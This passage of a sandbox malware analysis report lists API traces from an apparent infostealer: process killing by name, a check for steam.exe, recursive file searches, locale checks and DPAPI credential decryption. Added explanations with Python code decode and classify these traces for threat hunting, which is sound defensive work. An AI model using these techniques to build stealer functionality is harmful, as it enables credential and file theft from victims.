                            • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                            • String ID: steam.exe
                            • API String ID: 2284531361-2826358650
                            • Opcode ID: 79f9dc1c357588748a925507f1a410fcef78adfd629b3b6d7984da83be8226e1
                            • Instruction ID: 3762502931b6a337b827abd5989e227c911d61b4423779e20e9c34b3f6f4e164
                            • Opcode Fuzzy Hash: 79f9dc1c357588748a925507f1a410fcef78adfd629b3b6d7984da83be8226e1
                            • Instruction Fuzzy Hash: 5C0162316013259BE7219BA1AC49FEA77BCEF08752F0401D6F908D20A0EF7499948AA1
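The two Toolhelp32 walks listed above differ in one detail that matters for triage: the function at 001448C9 follows its StrCmpCA match with OpenProcess(00000001, …) and TerminateProcess, while the function at 00144838 only compares every entry against `steam.exe` and closes the snapshot. The report prints the arguments as raw hex; decoded, 00000002 is TH32CS_SNAPPROCESS, 00000128 (296) is the dwSize a PROCESSENTRY32 must carry before Process32First succeeds, and the access mask 00000001 is exactly PROCESS_TERMINATE, the smallest right that lets a process kill another. The following is an added example, not code from the report or the sample: it parses the two API lists as constructed trace lines, decodes those constants, and labels each walk as a kill-by-name loop or a presence check. The trace line format is the report's; the names of the decoded flags are taken from the Windows SDK headers; which process name the kill loop receives is not shown in the report (its StrCmpCA argument is `?`), so the example leaves it unresolved.

```python
"""Added example (not from the Joe Sandbox report or the sample): decode and
classify the two Toolhelp32 API sequences shown above. The trace lines below
are copied from the report; everything else is illustration."""
import re
from typing import Dict, List, Tuple, Union

# Win32 constants behind the raw hex in the report (values from the SDK headers).
TH32CS_FLAGS = {0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS",
                0x4: "TH32CS_SNAPTHREAD", 0x8: "TH32CS_SNAPMODULE"}
PROCESS_ACCESS = {0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
                  0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
                  0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION",
                  0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
SIZEOF_PROCESSENTRY32 = 0x128  # 296 bytes (ANSI, 32-bit); dwSize must equal this

# Constructed traces: the two API lists from the report, one call per line.
KILL_TRACE = [
    "CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 001448C9",
    "Process32First.KERNEL32(00000000,00000128), ref: 001448D9",
    "Process32Next.KERNEL32(00000000,00000128), ref: 001448EB",
    "StrCmpCA.SHLWAPI(?,?), ref: 001448FD",
    "OpenProcess.KERNEL32(00000001,00000000,?), ref: 00144912",
    "TerminateProcess.KERNEL32(00000000,00000000), ref: 00144921",
    "CloseHandle.KERNEL32(00000000), ref: 00144928",
    "Process32Next.KERNEL32(00000000,00000128), ref: 00144936",
    "CloseHandle.KERNEL32(00000000), ref: 00144941",
]
CHECK_TRACE = [
    "CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00144838",
    "Process32First.KERNEL32(00000000,00000128), ref: 00144848",
    "Process32Next.KERNEL32(00000000,00000128), ref: 0014485A",
    "StrCmpCA.SHLWAPI(?,steam.exe), ref: 00144870",
    "Process32Next.KERNEL32(00000000,00000128), ref: 00144882",
    "CloseHandle.KERNEL32(00000000), ref: 0014488D",
]

CALL_RE = re.compile(r"^(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
Arg = Union[int, str]
HEX = set("0123456789ABCDEFabcdef")


def parse_call(line: str) -> Tuple[str, List[Arg], int]:
    """'Api.MODULE(a,b), ref: 00144838' -> (api, args, ref). Eight hex digits become
    an int; '?' (unresolved) and string literals such as steam.exe stay strings."""
    m = CALL_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised trace line: {line!r}")
    args: List[Arg] = []
    for a in m["args"].split(","):
        a = a.strip()
        args.append(int(a, 16) if len(a) == 8 and set(a) <= HEX else a)
    return m["api"], args, int(m["ref"], 16)


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Expand a bitmask into SDK names; any bit not in the table is kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    return names + ([f"0x{rest:X}"] if rest else [])


def classify(trace: List[str]) -> Dict[str, object]:
    """'kill-by-name' when a name match is followed by OpenProcess then TerminateProcess,
    'presence-check' when the walk only compares names, 'unknown' otherwise."""
    calls = [parse_call(line) for line in trace]
    apis = [api for api, _, _ in calls]
    result: Dict[str, object] = {"snapshot": [], "dwsize_ok": False, "target": None,
                                 "open_access": [], "verdict": "unknown"}
    for api, args, _ in calls:
        if api == "CreateToolhelp32Snapshot" and isinstance(args[0], int):
            result["snapshot"] = decode_flags(args[0], TH32CS_FLAGS)
        elif api in ("Process32First", "Process32Next"):
            result["dwsize_ok"] = args[1] == SIZEOF_PROCESSENTRY32
        elif api == "StrCmpCA":
            literal = [a for a in args if isinstance(a, str) and a != "?"]
            result["target"] = literal[0] if literal else None
        elif api == "OpenProcess" and isinstance(args[0], int):
            result["open_access"] = decode_flags(args[0], PROCESS_ACCESS)
    walks = {"Process32First", "Process32Next", "StrCmpCA"} <= set(apis)
    if walks and "OpenProcess" in apis and "TerminateProcess" in apis \
            and apis.index("OpenProcess") < apis.index("TerminateProcess"):
        result["verdict"] = "kill-by-name"
    elif walks:
        result["verdict"] = "presence-check"
    return result


if __name__ == "__main__":
    for func, trace in (("001448C9", KILL_TRACE), ("00144838", CHECK_TRACE)):
        print(func, classify(trace))
```

The same split is useful as a hunting heuristic: a snapshot walk that opens other processes with an access mask of exactly 0x1 is almost never legitimate software, whereas a walk that only compares names (here against `steam.exe`) is the reconnaissance step that decides which data to collect.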
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00134CB1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134CD4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00134CDF
                            • lstrlen.KERNEL32(00154CAC), ref: 00134CEA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134D07
                            • lstrcat.KERNEL32(00000000,00154CAC), ref: 00134D13
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134D3E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00134D5A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID:
                            • API String ID: 2567437900-0
                            • Opcode ID: f27ce56198fdfc13ca6630598147098ec26861bca2a4e9efe0d5bcc1cf3db674
                            • Instruction ID: 74977576bd8bcf751c0959590d388e47285afc6c459acc3a143601a54f5e16df
                            • Opcode Fuzzy Hash: f27ce56198fdfc13ca6630598147098ec26861bca2a4e9efe0d5bcc1cf3db674
                            • Instruction Fuzzy Hash: ED319031521636ABCB32EF64FC86A9E77B9AF65305F001225F81697A65CB30EC518B90
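Three of the functions above are variants of the same directory walk: build a search mask with `%s\*` (or append `\*.*`), call FindFirstFileA, compare each entry name with two short constants via StrCmpCA, recurse into subdirectories with `%s\%s` via FindNextFileA, and FindClose at the end. The following is an added example, not code from the report or the sample: a pure-Python model of that loop run over a constructed in-memory tree, including the detail that makes the two StrCmpCA calls necessary. FindFirstFileA on a `dir\*` mask returns the pseudo-entries `.` and `..` before real names, and a walker that does not skip them re-enters the same directory forever. The report shows the compared constants only as addresses (001517A8 and 001517AC), so treating them as `.` and `..` is an assumption, as are the file names in the sample tree.

```python
"""Added example (not from the Joe Sandbox report or the sample): a model of the
FindFirstFileA/FindNextFileA directory walk over an in-memory tree. The '.' and
'..' skip is assumed to be what the two StrCmpCA calls in the sample do."""
from typing import Dict, Iterator, List, Tuple, Union

Tree = Dict[str, Union["Tree", bytes]]  # directory name -> subtree, file name -> content

# Constructed sample tree; names and contents are illustration only.
SAMPLE_TREE: Tree = {
    "Users": {
        "victim": {
            "Desktop": {"notes.txt": b"hello", "wallet.dat": b"\x00\x01"},
            "AppData": {"Local": {"cache.bin": b"\xff"}},
        }
    },
    "pagefile.sys": b"",
}


def _lookup(root: Tree, path: str) -> Tree:
    """Resolve 'C:\\a\\b' inside the tree. '.' stays in place and '..' goes up, as the
    Win32 path parser does, which is exactly why the walker must skip them."""
    stack: List[Tree] = [root]
    for part in path.split("\\")[1:]:  # drop the drive component
        if part in ("", "."):
            continue
        if part == "..":
            if len(stack) > 1:
                stack.pop()
            continue
        child = stack[-1][part]  # KeyError models ERROR_PATH_NOT_FOUND
        if not isinstance(child, dict):
            raise NotADirectoryError(path)
        stack.append(child)
    return stack[-1]


def find_files(root: Tree, mask: str) -> Iterator[Tuple[str, bool]]:
    """Model of FindFirstFileA/FindNextFileA for a 'dir\\*' or 'dir\\*.*' mask:
    yields (name, is_directory), with the '.' and '..' pseudo-entries first."""
    directory, pattern = mask.rsplit("\\", 1)
    if pattern not in ("*", "*.*"):
        raise ValueError("model only supports the wildcard masks seen in the sample")
    yield ".", True
    yield "..", True
    for name, child in _lookup(root, directory).items():
        yield name, isinstance(child, dict)


def walk(root: Tree, directory: str, skip_dots: bool = True, depth: int = 0) -> List[str]:
    """The sample's loop: wsprintf('%s\\*'), iterate, recurse into subdirectories
    through '%s\\%s', collect full file paths. depth bounds the failure mode."""
    if depth > 32:
        raise RecursionError(f"unbounded recursion at {directory}")
    found: List[str] = []
    for name, is_dir in find_files(root, f"{directory}\\*"):
        if skip_dots and name in (".", ".."):
            continue  # the two StrCmpCA calls (assumed to compare against '.' and '..')
        full = f"{directory}\\{name}"  # '%s\\%s'
        if is_dir:
            found.extend(walk(root, full, skip_dots, depth + 1))
        else:
            found.append(full)
    return found


def dots_skip_matters(root: Tree, directory: str = "C:") -> bool:
    """True if walking without the '.'/'..' comparison never terminates (hits the guard)."""
    try:
        walk(root, directory, skip_dots=False)
    except RecursionError:
        return True
    return False


if __name__ == "__main__":
    for path in walk(SAMPLE_TREE, "C:"):
        print(path)
    print("skip needed:", dots_skip_matters(SAMPLE_TREE))
```

The model reproduces the observable order of the real API (pseudo-entries first, then directory entries in enumeration order), which is the order a file-grabber's exfiltration archive ends up in.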
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 6_{$9F $CTg~$Udv7$pn$rR!$}_R{$I{
                            • API String ID: 0-535894889
                            • Opcode ID: b391ffa2071f9d0fae88fca73c9605c9f35c9545a700502eeb4ff4e921f6f842
                            • Instruction ID: 2257925ca11d6b6c4d42d509cbddecc09b551ed58bf0bdb16bdd5bee3e973a44
                            • Opcode Fuzzy Hash: b391ffa2071f9d0fae88fca73c9605c9f35c9545a700502eeb4ff4e921f6f842
                            • Instruction Fuzzy Hash: 77B228F360C2049FE308AE2DEC8567AFBE5EF94720F164A3DE6C5C3744EA3558418696
                            APIs
                              • Part of subcall function 001473F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0014740E
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00142F6B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00142F7D
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00142F8A
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00142FBC
                            • LocalFree.KERNEL32(00000000), ref: 0014319A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 46b8913d9f4e12d8c44c6b19d5ee59af1545bddccfc50148cad338030a01fc36
                            • Instruction ID: effa6cd7e1134b606d506853ab9b5c6e625db5a64e0cf4d5375ff7e4139254e0
                            • Opcode Fuzzy Hash: 46b8913d9f4e12d8c44c6b19d5ee59af1545bddccfc50148cad338030a01fc36
                            • Instruction Fuzzy Hash: 8DB12770900214CFD715CF58C988BA5B7F5FB44725F29C1AAE418AB2B2D7769E82CF90
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 3M9=$=v|Y$G _r$^/}y$g@S$uW7o$w
                            • API String ID: 0-2757279503
                            • Opcode ID: e876cdb323ad723e27316e05ed251fffedb4c518d4a88dc55bf0a385a97a3e33
                            • Instruction ID: 71a831adbbde5e02d9afbff4fa4ec87d42a8f348b82597b96fe6d546a1790613
                            • Opcode Fuzzy Hash: e876cdb323ad723e27316e05ed251fffedb4c518d4a88dc55bf0a385a97a3e33
                            • Instruction Fuzzy Hash: F9B22AF3A0C2149FE3046E2DEC8567AFBE5EB94320F1A463DEAC5C7744E93598018697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: !$4yz $NE~c$Qm5_$e0]?$g0[
                            • API String ID: 0-1897305345
                            • Opcode ID: c927746c9f473cd9e455e5301de06d1c17ae99bf70c430e93943c41364ffac0d
                            • Instruction ID: b4c0a213b6ee23cc067bf2661e196726bf3563f26d2bc7208e919a221240819d
                            • Opcode Fuzzy Hash: c927746c9f473cd9e455e5301de06d1c17ae99bf70c430e93943c41364ffac0d
                            • Instruction Fuzzy Hash: 7DB2F5F360C6009FE308AE2DDC8567AFBE9EF94720F16893DE6C5C3744E63598018696
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 'Un+$8O:^$cF7$mO;$s+'e$w<om
                            • API String ID: 0-1144376598
                            • Opcode ID: 5ee980141ba50dfca37a6edc1bce546f7ba88e0827d894df141afda65e40172f
                            • Instruction ID: 71dfb0d2bd6255a8f3a34c45a1813fe1d75eceea7fcd58428b38762254865b60
                            • Opcode Fuzzy Hash: 5ee980141ba50dfca37a6edc1bce546f7ba88e0827d894df141afda65e40172f
                            • Instruction Fuzzy Hash: EFB2D5F3A0C2049FE304AE2DEC8567ABBE9EF94720F1A853DE6C4C7744E63558058697
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00142E12
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00142E19
                            • GetTimeZoneInformation.KERNEL32(?), ref: 00142E28
                            • wsprintfA.USER32 ref: 00142E53
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID: wwww
                            • API String ID: 3317088062-671953474
                            • Opcode ID: 318d1ea1afccfcc4a64b227b30d35fcceb1ce415b5af937294c5fcbb0c6890c2
                            • Instruction ID: 1bb0069c8a905acea5b5c8bc14d8c567cf4d4d073ca23dc2f712382336c56139
                            • Opcode Fuzzy Hash: 318d1ea1afccfcc4a64b227b30d35fcceb1ce415b5af937294c5fcbb0c6890c2
                            • Instruction Fuzzy Hash: 75012B71A00704EBD7189F58DC49F6AB76DEB84721F00436AFD15DB3D0D774190086D1
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0012775E
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00127765
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0012778D
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 001277AD
                            • LocalFree.KERNEL32(?), ref: 001277B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: b5558514aec9ae0ade5a42ef1318b39455bf2c51e9d6a5c879ea35c58b4125d7
                            • Instruction ID: c2fdc5ae19365f9cc3673088f4023bacabc4fd7189780feca9b0c58d64614d1f
                            • Opcode Fuzzy Hash: b5558514aec9ae0ade5a42ef1318b39455bf2c51e9d6a5c879ea35c58b4125d7
                            • Instruction Fuzzy Hash: 5A012575B40318BBEB10DB94DC4AFAA7B7CEB44B15F104555FB09EB2D0D6B09900C790
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: *,o$M )o$Tw"3$V8&
                            • API String ID: 0-3806578423
                            • Opcode ID: ffc3f34a185c27711c71e88373e4d4879f5699810ee36feb03005d8ae1ac9251
                            • Instruction ID: a00c55f3c57213faf525e0fc14a4ba7689a024cc00feea6f393196cda90c662e
                            • Opcode Fuzzy Hash: ffc3f34a185c27711c71e88373e4d4879f5699810ee36feb03005d8ae1ac9251
                            • Instruction Fuzzy Hash: 5CA205F3A0C6149FE3046E2DEC8567ABBE9EF94720F1A493DE6C4C3744EA3558018697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: :nJ$H2}p$O_ $ZR{o
                            • API String ID: 0-1834902799
                            • Opcode ID: 25b776f7a92be206ea4fe60601a696184b0ed81a2171dd096f46fe05507b1c61
                            • Instruction ID: 9d1268ff9723b61ae37b106203f2a383f49a271e7c37dc2f40c0c9a1cc61e85b
                            • Opcode Fuzzy Hash: 25b776f7a92be206ea4fe60601a696184b0ed81a2171dd096f46fe05507b1c61
                            • Instruction Fuzzy Hash: CB8206F3A0C6109FE304AE29EC8567ABBE5EF94320F168A3DE6C5C3744E63558418697
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0012EBC6
                            • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0012EBCE
                            • lstrcat.KERNEL32(0014CFF4,0014CFF4), ref: 0012EC77
                            • lstrcat.KERNEL32(0014CFF4,0014CFF4), ref: 0012EC99
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: ec9ec331ca2e0debac5a9a06b38bd088f50540d8ff7a4cd2bcf894465aeffb10
                            • Instruction ID: dda116ea9fb7e028563d807f4d7a9fd426b789dbc2af443a75c81a664ff20a69
                            • Opcode Fuzzy Hash: ec9ec331ca2e0debac5a9a06b38bd088f50540d8ff7a4cd2bcf894465aeffb10
                            • Instruction Fuzzy Hash: 1B31E776A00219ABDB11CB98EC46BEEBB7DDF84705F044166F908F2290DBB05A148BE1
                            APIs
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 001442DD
                            • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 001442EC
                            • RtlAllocateHeap.NTDLL(00000000), ref: 001442F3
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00144323
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptHeapString$AllocateProcess
                            • String ID:
                            • API String ID: 3825993179-0
                            • Opcode ID: be0c36120ad1c9c37a146398a24bce40696143e8e8dfaad75761ec02d3217355
                            • Instruction ID: 923a27542639162e7d1c7db6083e10f2c7399e3a8ce7fcfd54e08062d918ccf6
                            • Opcode Fuzzy Hash: be0c36120ad1c9c37a146398a24bce40696143e8e8dfaad75761ec02d3217355
                            • Instruction Fuzzy Hash: 71011A70600205BBDB109FA5EC89FAABBADEF89312F108559BD0997260DB7099418B64
                            APIs
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00129B3B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00129B4A
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00129B61
                            • LocalFree.KERNEL32 ref: 00129B70
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID:
                            • API String ID: 4291131564-0
                            • Opcode ID: a95b5970dd57fde8afd2544d8d44834bac72f7ac9f9fdcdfbd6d79a8fabd63a2
                            • Instruction ID: d4c6412c0a39a3b2ae2868ef09545beb0a4e74803cb97944c42c73b837bdc581
                            • Opcode Fuzzy Hash: a95b5970dd57fde8afd2544d8d44834bac72f7ac9f9fdcdfbd6d79a8fabd63a2
                            • Instruction Fuzzy Hash: ECF01D71340322ABF7311F68AC49F977BACEF04B52F240515FA45EA2D0D7B49850CAA4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: O.$OL|W$a;]w
                            • API String ID: 0-2161251978
                            • Opcode ID: 227555393ef05aa7783c6719b4b03c26f9147035a5542ecd461763aa90dfda80
                            • Instruction ID: 779372869f0e9da606d8257288160c0644265013479821b5bdace99cfa4dd3e0
                            • Opcode Fuzzy Hash: 227555393ef05aa7783c6719b4b03c26f9147035a5542ecd461763aa90dfda80
                            • Instruction Fuzzy Hash: 56B2D2F39082049FE304AE29EC8566AFBE9EF94720F16893DE6C5C3744E63598418797
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00144075
                            • lstrcpy.KERNEL32(00000000,013FA5B0), ref: 0014409F
                            • GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0012134E,?,0000001A), ref: 001440A9
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$SystemTime
                            • String ID:
                            • API String ID: 684065273-0
                            • Opcode ID: 51be082db025e95e07c8e372b259091c9ed8f8edcce814e99ab0553828cd4d8f
                            • Instruction ID: 145619c993c19f10642de87a41055034d46cdc71f84774e157fab9f0054990c8
                            • Opcode Fuzzy Hash: 51be082db025e95e07c8e372b259091c9ed8f8edcce814e99ab0553828cd4d8f
                            • Instruction Fuzzy Hash: 72416D74A013169FDB15CF25C884B66BBE8FF19315F0984AAE849DB271C775EC82CB80
                            APIs
                            • CoCreateInstance.COMBASE(0014B118,00000000,00000001,0014B108,?), ref: 0013CCF6
